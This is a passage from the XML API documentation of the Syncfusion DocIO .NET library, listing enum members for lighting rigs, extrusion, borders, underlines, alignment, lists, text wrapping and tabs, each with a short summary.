            Specifies Legacy Normal 4 type.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.DLS.LightRigType.LegacyHarsh1">
            <summary>
            Specifies Legacy Harsh 1 type.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.DLS.LightRigType.LegacyHarsh2">
            <summary>
            Specifies Legacy Harsh 2 type.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.DLS.LightRigType.LegacyHarsh3">
            <summary>
            Specifies Legacy Harsh 3 type.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.DLS.LightRigType.LegacyHarsh4">
            <summary>
            Specifies Legacy Harsh 4 type.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.DLS.LightRigType.LegacyFlat1">
            <summary>
            Specifies Legacy Flat 1 type.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.DLS.LightRigType.LegacyFlat2">
            <summary>
            Specifies Legacy Flat 2 type.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.DLS.LightRigType.LegacyFlat3">
            <summary>
            Specifies Legacy Flat 3 type.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.DLS.LightRigType.LegacyFlat4">
            <summary>
            Specifies Legacy Flat 4 type.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.DLS.LightRigType.Harsh">
            <summary>
            Specifies Harsh type.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.DLS.LightRigType.Glow">
            <summary>
            Specifies Glow type.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.DLS.LightRigType.Freezing">
            <summary>
            Specifies Freezing type.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.DLS.LightRigType.Flood">
            <summary>
            Specifies Flood type.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.DLS.LightRigType.Flat">
            <summary>
            Specifies Flat type.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.DLS.LightRigType.Contrasting">
            <summary>
            Specifies Contrasting type.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.DLS.LightRigType.Chilly">
            <summary>
            Specifies Chilly type.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.DLS.LightRigType.BrightRoom">
            <summary>
            Specifies BrightRoom type.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.DLS.LightRigType.Balanced">
            <summary>
            Specifies Balanced type.
            </summary>
        </member>
        <member name="T:Syncfusion.DocIO.DLS.ExtrusionPlane">
            <summary>
            Specifies type of the Extrusion Plane Preset Type.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.DLS.ExtrusionPlane.XY">
            <summary>
            Specifies XY Plane
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.DLS.ExtrusionPlane.YZ">
            <summary>
            Specifies YZ plane
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.DLS.ExtrusionPlane.ZX">
            <summary>
            Specifies ZX plane
            </summary>
        </member>
        <member name="T:Syncfusion.DocIO.DLS.TileFlipMode">
            <summary>
            Specifies type of the Tile Filp Type.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.DLS.TileFlipMode.None">
            <summary>
            Specifies No Plane
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.DLS.TileFlipMode.XY">
            <summary>
            Specifies XY Plane
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.DLS.TileFlipMode.Y">
            <summary>
            Specifies Y plane
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.DLS.TileFlipMode.X">
            <summary>
            Specifies X plane
            </summary>
        </member>
        <member name="T:Syncfusion.DocIO.DLS.ExtrusionType">
            <summary>
            Specifies type of the Extrusion Preset Type.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.DLS.ExtrusionType.Parallel">
            <summary>
            Specifies Parallel type
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.DLS.ExtrusionType.Perspective">
            <summary>
            Specifies Perspective type
            </summary>
        </member>
        <member name="T:Syncfusion.DocIO.DLS.ExtrusionRenderMode">
            <summary>
            Specifies type of the Extrusion Render Mode Type.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.DLS.ExtrusionRenderMode.Solid">
            <summary>
            Specifies Solid mode
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.DLS.ExtrusionRenderMode.Wireframe">
            <summary>
            Specifies Wireframe mode.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.DLS.ExtrusionRenderMode.BoundingCube">
            <summary>
            Specifies Bounding cube.
            </summary>
        </member>
        <member name="T:Syncfusion.DocIO.DLS.FillAspect">
            <summary>
            Specifies type of the Fill Aspects.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.DLS.FillAspect.Ignore">
            <summary>
            Specifies Atleast. 
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.DLS.FillAspect.Atmost">
            <summary>
            Specifies Atmost.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.DLS.FillAspect.Atleast">
            <summary>
            Specifies Ignore.
            </summary>
        </member>
        <member name="T:Syncfusion.DocIO.DLS.BlipCompressionType">
            <summary>
            Specifies type of the Blip Compression Type.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.DLS.BlipCompressionType.None">
            <summary>
            Specifies No compression mode.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.DLS.BlipCompressionType.Email">
            <summary>
            Specifies Email mode
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.DLS.BlipCompressionType.Print">
            <summary>
            Specifies Print mode.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.DLS.BlipCompressionType.Screen">
            <summary>
            Specifies Screen mode.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.DLS.BlipCompressionType.Hqprint">
            <summary>
            Specifies High Quality Printing mode.
            </summary>
        </member>
        <member name="T:Syncfusion.DocIO.DLS.ShadowType">
            <summary>
            Specifies type of the shadow type.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.DLS.ShadowType.Single">
            <summary>
            Specifies single shadow.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.DLS.ShadowType.Double">
            <summary>
            Specifies double shadow.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.DLS.ShadowType.Perspective">
            <summary>
            Specifies top alignment.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.DLS.ShadowType.ShapeRelative">
            <summary>
            Specifies the shadow which is shape relative.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.DLS.ShadowType.DrawingRelative">
            <summary>
            Specifies the shadow which is drawing relative.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.DLS.ShadowType.Emboss">
            <summary>
            Specifies emboss shadow.
            </summary>
        </member>
        <member name="T:Syncfusion.DocIO.DLS.HorizontalAlignment">
            <summary>
            Specifies type of the horizontal alignment.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.DLS.HorizontalAlignment.Left">
            <summary>
            Specifies paragraph text is aligned to the left.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.DLS.HorizontalAlignment.Center">
            <summary>
            Specifies paragraph text is aligned to the center. 
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.DLS.HorizontalAlignment.Right">
            <summary>
            Specifies paragraph text is aligned to the right. 
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.DLS.HorizontalAlignment.Justify">
            <summary>
            Specifies paragraph text is aligned to both left and right.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.DLS.HorizontalAlignment.Distribute">
            <summary>
            Specifies paragraph characters are distributed to fill the entire width of the paragraph. 
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.DLS.HorizontalAlignment.JustifyMedium">
            <summary>
            Specifies paragraph uses medium-length Kashida, if the language is Arabic. In other languages, paragraph text is justified with a medium character compression ratio. 
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.DLS.HorizontalAlignment.JustifyHigh">
            <summary>
            Specifies paragraph uses longer length Kashida, if the language is Arabic. In other languages, paragraph text is justified with a high character compression ratio. 
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.DLS.HorizontalAlignment.JustifyLow">
            <summary>
            Specifies paragraph uses small length Kashida, if the language is Arabic. In other languages, paragraph text is justified with a high character compression ratio. 
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.DLS.HorizontalAlignment.ThaiJustify">
            <summary>
            Specifies paragraph text is justified with Thai distributed justification, if the language is Thai. In other languages, text is justified with a low character compression ratio.
            </summary>
        </member>
        <member name="T:Syncfusion.DocIO.DLS.RowAlignment">
            <summary>
            Specifies type of the horizontal row alignment.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.DLS.RowAlignment.Left">
            <summary>
            Specifies row alignment to the left. 
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.DLS.RowAlignment.Center">
            <summary>
            Specifies row alignment to the center. 
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.DLS.RowAlignment.Right">
            <summary>
            Specifies row alignment to the right. 
            </summary>
        </member>
        <member name="T:Syncfusion.DocIO.DLS.UnderlineStyle">
            <summary>
            Specifies style of the underline.
            </summary>
            <remarks>This enum is not supported in MVC6 and Xamarin platforms.</remarks>
        </member>
        <member name="F:Syncfusion.DocIO.DLS.UnderlineStyle.None">
            <summary>
            No underline.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.DLS.UnderlineStyle.Single">
            <summary>
            A single line. <i>default</i>.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.DLS.UnderlineStyle.Words">
            <summary>
            Underline individual words only.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.DLS.UnderlineStyle.Double">
            <summary>
            A double line.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.DLS.UnderlineStyle.Dotted">
            <summary>
            Dots.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.DLS.UnderlineStyle.DotDot">
            <summary>
            
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.DLS.UnderlineStyle.Thick">
            <summary>
            A single thick line.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.DLS.UnderlineStyle.Dash">
            <summary>
            Dashes.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.DLS.UnderlineStyle.DashLong">
            <summary>
            Long dashes.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.DLS.UnderlineStyle.DotDash">
            <summary>
            Alternating dots and dashes.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.DLS.UnderlineStyle.DotDotDash">
            <summary>
            An alternating dot-dot-dash pattern.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.DLS.UnderlineStyle.Wavy">
            <summary>
            A single wavy line.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.DLS.UnderlineStyle.DottedHeavy">
            <summary>
            Heavy dots.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.DLS.UnderlineStyle.DashHeavy">
            <summary>
            Heavy dashes.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.DLS.UnderlineStyle.DashLongHeavy">
            <summary>
            Long heavy dashes.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.DLS.UnderlineStyle.DotDashHeavy">
            <summary>
            Alternating heavy dots and heavy dashes.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.DLS.UnderlineStyle.DotDotDashHeavy">
            <summary>
            An alternating heavy dot-dot-dash pattern.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.DLS.UnderlineStyle.WavyHeavy">
            <summary>
            A heavy wavy line.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.DLS.UnderlineStyle.WavyDouble">
            <summary>
            A double wavy line.
            </summary>
        </member>
        <member name="T:Syncfusion.DocIO.DLS.SubSuperScript">
            <summary>
            Specifies type of the sub and super script.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.DLS.SubSuperScript.None">
            <summary>
            No sub- or superscript.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.DLS.SubSuperScript.SuperScript">
            <summary>
            Specified superscript format.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.DLS.SubSuperScript.SubScript">
            <summary>
            Specified subscript format.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.DLS.BreakClearType.None">
            <summary>
            
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.DLS.BreakClearType.Left">
            <summary>
            
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.DLS.BreakClearType.Right">
            <summary>
            
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.DLS.BreakClearType.All">
            <summary>
            
            </summary>
        </member>
        <member name="T:Syncfusion.DocIO.DLS.BorderStyle">
            <summary>
            Specifies the line style of the border.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.DLS.BorderStyle.None">
            <summary>
            No border.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.DLS.BorderStyle.Single">
            <summary>
            A single solid line.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.DLS.BorderStyle.Thick">
            <summary>
            Thick solid lines.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.DLS.BorderStyle.Double">
            <summary>
            Double solid lines.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.DLS.BorderStyle.Hairline">
            <summary>
            Hairline border.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.DLS.BorderStyle.Dot">
            <summary>
            Dots.
            </summary> 
        </member>
        <member name="F:Syncfusion.DocIO.DLS.BorderStyle.DashLargeGap">
            <summary>
            A dash followed by a large gap.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.DLS.BorderStyle.DotDash">
            <summary>
            A dash followed by a dot.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.DLS.BorderStyle.DotDotDash">
            <summary>
            A dash followed by two dots.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.DLS.BorderStyle.Triple">
            <summary>
            Three solid thin lines.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.DLS.BorderStyle.ThinThickSmallGap">
            <summary>
            An internal single thin solid line surrounded by a single thick solid line with a small gap between them.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.DLS.BorderStyle.ThinThinSmallGap">
            <summary>
            An internal single thick solid line surrounded by a single thin solid line with a small gap between them.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.DLS.BorderStyle.ThinThickThinSmallGap">
            <summary>
            An internal single thin solid line surrounded by a single thick solid line surrounded by a single thin solid line with a small gap between all lines.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.DLS.BorderStyle.ThinThickMediumGap">
            <summary>
            An internal single thin solid line surrounded by a single thick solid line with a medium gap between them.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.DLS.BorderStyle.ThickThinMediumGap">
            <summary>
            An internal single thick solid line surrounded by a single thin solid line with a medium gap between them.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.DLS.BorderStyle.ThickThickThinMediumGap">
            <summary>
            An internal single thin solid line surrounded by a single thick solid line surrounded by a single thin solid line with a medium gap between all lines.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.DLS.BorderStyle.ThinThickLargeGap">
            <summary>
            An internal single thin solid line surrounded by a single thick solid line with a large gap between them.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.DLS.BorderStyle.ThickThinLargeGap">
            <summary>
            An internal single thick solid line surrounded by a single thin solid line with a large gap between them.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.DLS.BorderStyle.ThinThickThinLargeGap">
            <summary>
            An internal single thin solid line surrounded by a single thick solid line surrounded by a single thin solid line with a large gap between all lines.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.DLS.BorderStyle.Wave">
            <summary>
            A single wavy solid line.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.DLS.BorderStyle.DoubleWave">
            <summary>
            Double wavy solid lines.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.DLS.BorderStyle.DashSmallGap">
            <summary>
            A dash followed by a small gap.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.DLS.BorderStyle.DashDotStroker">
            <summary>
            A dash followed by a dot stroke, thus rendering a border similar to a barber pole.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.DLS.BorderStyle.Emboss3D">
            <summary>
            The border appears to have a 3-D embossed look.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.DLS.BorderStyle.Engrave3D">
            <summary>
            The border appears to have a 3-D engraved look.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.DLS.BorderStyle.Outset">
            <summary>
            The border appears to be outset.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.DLS.BorderStyle.Inset">
            <summary>
            The border appears to be inset.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.DLS.BorderStyle.TwistedLines1">
            <summary>
            Twisted Lines Art Border.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.DLS.BorderStyle.Cleared">
            <summary>
            Cleared border.
            </summary>
        </member>
        <member name="T:Syncfusion.DocIO.DLS.SectionBreakCode">
            <summary>
            Specifies type of the section break code.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.DLS.SectionBreakCode.NoBreak">
            <summary>
            No break with the new section beginning on the next paragraph of the same page.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.DLS.SectionBreakCode.NewColumn">
            <summary>
            Column break with the new section beginning on the next column on the page.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.DLS.SectionBreakCode.NewPage">
            <summary>
            Section break with the new section beginning on the next page.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.DLS.SectionBreakCode.EvenPage">
            <summary>
            Section break with the new section beginning on the next even-numbered page.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.DLS.SectionBreakCode.Oddpage">
            <summary>
            Section break with the new section beginning on the next odd-numbered page.
            </summary>
        </member>
        <member name="T:Syncfusion.DocIO.DLS.HyperlinkType">
            <summary>
            Specifies type of the link. 
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.DLS.HyperlinkType.None">
            <summary>
            No links. 
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.DLS.HyperlinkType.FileLink">
            <summary>
            Links to another file. 
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.DLS.HyperlinkType.WebLink">
            <summary>
            Links to a web page. 
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.DLS.HyperlinkType.EMailLink">
            <summary>
            Link to e-mail.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.DLS.HyperlinkType.Bookmark">
            <summary>
            Bookmark link.
            </summary>
        </member>
        <member name="T:Syncfusion.DocIO.DLS.ListType">
            <summary>
            Specifies type of the list format.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.DLS.ListType.Numbered">
            <summary>
            Specifies numbered list. 
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.DLS.ListType.Bulleted">
            <summary>
            Specifies bulleted list.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.DLS.ListType.NoList">
            <summary>
            No numbering.
            </summary>
        </member>
        <member name="T:Syncfusion.DocIO.DLS.ListPatternType">
            <summary>
            Specifies type of the list numbering format.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.DLS.ListPatternType.Arabic">
            <summary>
            Arabic format.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.DLS.ListPatternType.UpRoman">
            <summary>
            Upper roman numbering format.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.DLS.ListPatternType.LowRoman">
            <summary>
            Lower roman numbering format.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.DLS.ListPatternType.UpLetter">
            <summary>
            Upper case letter numbering format.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.DLS.ListPatternType.LowLetter">
            <summary>
            Lower case letter numbering format.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.DLS.ListPatternType.Ordinal">
            <summary>
            Ordinal numbering format.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.DLS.ListPatternType.Number">
            <summary>
            Number numbering format.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.DLS.ListPatternType.OrdinalText">
            <summary>
            Ordinal text numbering format.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.DLS.ListPatternType.LeadingZero">
            <summary>
            Leading zero numbering format.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.DLS.ListPatternType.Bullet">
            <summary>
            Bullet numbering format.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.DLS.ListPatternType.FarEast">
            <summary>
            Far east numbering format.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.DLS.ListPatternType.Special">
            <summary>
            Special numbering format.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.DLS.ListPatternType.None">
            <summary>
            Specifies None numbering format.
            </summary>
        </member>
        <member name="T:Syncfusion.DocIO.DLS.CellMerge">
            <summary>
            Specifies the way of cell merging.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.DLS.CellMerge.None">
            <summary>
            No merge.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.DLS.CellMerge.Start">
            <summary>
            Merge starts from this cell.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.DLS.CellMerge.Continue">
            <summary>
            Merge is continued.
            </summary>
        </member>
        <member name="T:Syncfusion.DocIO.DLS.ShapePosition">
            <summary>
            Specifies shape position 
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.DLS.ShapePosition.Static">
            <summary>
            
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.DLS.ShapePosition.Absolute">
            <summary>
            
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.DLS.ShapePosition.Relative">
            <summary>
            
            </summary>
        </member>
        <member name="T:Syncfusion.DocIO.DLS.HorizontalOrigin">
            <summary>
            Specifies the horizontal origin of the object.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.DLS.HorizontalOrigin.Margin">
            <summary>
            Origin to margin.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.DLS.HorizontalOrigin.Page">
            <summary>
            Origin to page.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.DLS.HorizontalOrigin.Column">
            <summary>
            Origin to column.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.DLS.HorizontalOrigin.Character">
            <summary>
            Origin to character.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.DLS.HorizontalOrigin.LeftMargin">
            <summary>
            Origin to left margin.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.DLS.HorizontalOrigin.RightMargin">
            <summary>
            Origin to right margin.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.DLS.HorizontalOrigin.InsideMargin">
            <summary>
            Origin to inner margin area.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.DLS.HorizontalOrigin.OutsideMargin">
            <summary>
            Origin to outer margin area.
            </summary>
        </member>
        <member name="T:Syncfusion.DocIO.DLS.VerticalOrigin">
            <summary>
            Specifies the vertical origin of the object.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.DLS.VerticalOrigin.Margin">
            <summary>
            Origin to margin.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.DLS.VerticalOrigin.Page">
            <summary>
            Origin to page.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.DLS.VerticalOrigin.Paragraph">
            <summary>
            Origin to paragraph.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.DLS.VerticalOrigin.Line">
            <summary>
            Origin to line.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.DLS.VerticalOrigin.TopMargin">
            <summary>
            Origin to top margin.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.DLS.VerticalOrigin.BottomMargin">
            <summary>
            Origin to bottom margin.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.DLS.VerticalOrigin.InsideMargin">
            <summary>
            Origin to inner margin area.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.DLS.VerticalOrigin.OutsideMargin">
            <summary>
            Origin to outer margin area.
            </summary>
        </member>
        <member name="T:Syncfusion.DocIO.DLS.HeightOrigin">
            <summary>
            Specifies the vertical origin of the object height.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.DLS.HeightOrigin.Margin">
            <summary>
            Origin to margin.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.DLS.HeightOrigin.Page">
            <summary>
            Origin to page.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.DLS.HeightOrigin.TopMargin">
            <summary>
            Origin to top margin.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.DLS.HeightOrigin.BottomMargin">
            <summary>
            Origin to bottom margin.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.DLS.HeightOrigin.InsideMargin">
            <summary>
            Origin to inner margin area.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.DLS.HeightOrigin.OutsideMargin">
            <summary>
            Origin to outer margin area.
            </summary>
        </member>
        <member name="T:Syncfusion.DocIO.DLS.WidthOrigin">
            <summary>
            Specifies the horizontal origin of the object width
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.DLS.WidthOrigin.Margin">
            <summary>
            Origin to margin.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.DLS.WidthOrigin.Page">
            <summary>
            Origin to page.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.DLS.WidthOrigin.LeftMargin">
            <summary>
            Origin to left margin.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.DLS.WidthOrigin.RightMargin">
            <summary>
            Origin to right margin.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.DLS.WidthOrigin.InsideMargin">
            <summary>
            Origin to inner margin area.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.DLS.WidthOrigin.OutsideMargin">
            <summary>
            Origin to outer margin area.
            </summary>
        </member>
        <member name="T:Syncfusion.DocIO.DLS.TextBoxLineStyle">
            <summary>
            Specifies the text box border line style.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.DLS.TextBoxLineStyle.Simple">
            <summary>
            A single solid line.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.DLS.TextBoxLineStyle.Double">
            <summary>
            Double solid lines.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.DLS.TextBoxLineStyle.ThickThin">
            <summary>
            Thick line next to thin line. For horizontal lines, thick line is below thin line. For vertical lines, thick line is to the right of the thin line.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.DLS.TextBoxLineStyle.ThinThick">
            <summary>
            Thick line next to thin line. For horizontal lines, thick line is above thin line. For vertical lines, thick line is to the left of the thin line.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.DLS.TextBoxLineStyle.Triple">
            <summary>
            Three solid lines.
            </summary>
        </member>
        <member name="T:Syncfusion.DocIO.DLS.TextWrappingStyle">
            <summary>
            Specifies the text wrap style.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.DLS.TextWrappingStyle.Inline">
            <summary>
            In line with text.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.DLS.TextWrappingStyle.TopAndBottom">
            <summary>
            Top and bottom.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.DLS.TextWrappingStyle.Square">
            <summary>
            Wraps text around the shape. Line continuation is on the opposite side of the shape.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.DLS.TextWrappingStyle.InFrontOfText">
            <summary>
            Places shape in front of text.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.DLS.TextWrappingStyle.Tight">
            <summary>
            Tight.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.DLS.TextWrappingStyle.Through">
            <summary>
            Through.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.DLS.TextWrappingStyle.Behind">
            <summary>
            Places shape behind text.
            </summary>
        </member>
        <member name="T:Syncfusion.DocIO.DLS.TextWrappingType">
            <summary>
            Specifies the text wrapping type.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.DLS.TextWrappingType.Both">
            <summary>
            Wrap text both sides.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.DLS.TextWrappingType.Left">
            <summary>
            Wrap text left side only.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.DLS.TextWrappingType.Right">
            <summary>
            Wrap text right side only.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.DLS.TextWrappingType.Largest">
            <summary>
            Side that is farthest from the page margin.
            </summary>
        </member>
        <member name="T:Syncfusion.DocIO.DLS.TabJustification">
            <summary>
            Specifies the tab justification.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.DLS.TabJustification.Left">
            <summary>
            Left tab.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.DLS.TabJustification.Centered">
            <summary>
            Centered tab.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.DLS.TabJustification.Right">
            <summary>
            Right tab.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.DLS.TabJustification.Decimal">
            <summary>
            Decimal tab.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.DLS.TabJustification.Bar">
            <summary>
            Bar.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.DLS.TabJustification.List">
            <summary>
            List.
            </summary>
        </member>
        <member name="T:Syncfusion.DocIO.DLS.TabLeader">
            <summary>
            Specifies the tab leader.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.DLS.TabLeader.NoLeader">
            <summary>
            No leader.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.DLS.TabLeader.Dotted">
            <summary>
